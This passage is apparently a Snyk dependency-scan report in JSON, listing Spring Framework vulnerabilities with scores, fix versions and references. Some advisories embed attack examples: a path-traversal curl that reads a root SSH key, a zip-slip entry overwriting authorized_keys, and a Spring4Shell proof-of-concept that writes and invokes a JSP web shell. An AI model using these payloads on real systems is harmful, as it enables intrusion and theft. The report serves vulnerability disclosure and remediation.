"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/util/StringUtils.java", - "className": "StringUtils", - "functionName": "cleanPath" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16414", - "title": "GitHub Issue" - }, - { - "url": "https://jira.spring.io/browse/SPR-12354", - "title": "Jira Issue" - }, - { - "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", - "title": "JVNDB" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", - "title": "NVD" - }, - { - "url": "https://pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], 
- "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:25.325641Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). 
In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", - "epssDetails": { - "percentile": "0.69801", - "probability": "0.00301", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3578" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.465000Z", - "functions_new": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "className": "org.springframework.util.StringUtils", - "functionName": "cleanPath" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-09-05T17:16:58Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2014-09-05T17:16:58Z", - "severityBasedOn": "CVSS", - "modificationTime": 
"2024-03-11T09:46:07.314890Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "4ra1n" - ], - "semver": { - "vulnerable": [ - "[,5.2.20.RELEASE)", - "[5.3.0,5.3.17)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.20.RELEASE", - "5.3.17" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28145", - "title": "GitHub Issue" - }, - { - "url": "https://pivotal.io/security/cve-2022-22950", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "cvssSources": [ - { - "type": "primary", - 
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:01.573408Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", - "epssDetails": { - "percentile": "0.35300", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22950" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2022-03-29T10:05:31.971026Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-03-29T09:51:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2022-03-29T14:24:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.044801Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": 
"3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Google OSS-Fuzz team" - ], - "semver": { - "vulnerable": [ - "[,5.2.23.RELEASE)", - "[5.3.0,5.3.26)", - "[6.0.0,6.0.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.23.RELEASE", - "5.3.26", - "6.0.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20861", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:22.626014Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", - "epssDetails": { - "percentile": "0.48906", - "probability": "0.00133", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20861" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-03-23T12:26:39.837900Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-23T11:49:46Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-03-23T12:37:13.052190Z", - 
"severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.291695Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Google OSS-Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,5.2.24.RELEASE)", - "[5.3.0,5.3.27)", - "[6.0.0,6.0.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.24.RELEASE", - "5.3.27", - "6.0.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20863", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "cvssSources": [ 
- { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:15.433654Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", - "epssDetails": { - "percentile": "0.70100", - "probability": "0.00306", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20863" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-04-14T06:33:20.884492Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-04-14T06:25:45Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, 
- "publicationTime": "2023-04-14T06:33:21.063044Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:09.820460Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ] - }, - "exploit": "High", - "fixedIn": [ - "5.2.20", - "5.3.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "filePath": "org/springframework/beans/CachedIntrospectionResults.java", - "className": "CachedIntrospectionResults", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", - "title": "CyberKendra Post" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", - "title": "GitHub Commit" - }, - { - "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", - "title": "LunaSec Blog" - }, - { - "url": "https://blog.payara.fish/payara-and-spring4shell", - "title": "Payara Blogpost" - }, - { - "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", - "title": "Payara PoC" - }, - { - "url": 
"https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", - "title": "Snyk Blog - Technical Breakdown" - }, - { - "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", - "title": "Snyk PoC" - }, - { - "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", - "title": "Spring Security Announcement" - }, - { - "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", - "title": "Spring Tomcat Mitigation Advice" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-30T15:25:03.231650Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "description": "## 
Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). 
\r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", - "epssDetails": { - "percentile": "0.99975", - "probability": "0.97485", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22965" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-03-30T21:42:31.436000Z", - "functions_new": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "className": "org.springframework.beans.CachedIntrospectionResults", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-30T21:42:24Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-03-30T22:32:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:17.474380Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Rob Ryan" - ], - "semver": { - "vulnerable": [ - "[,5.2.22.RELEASE)", - 
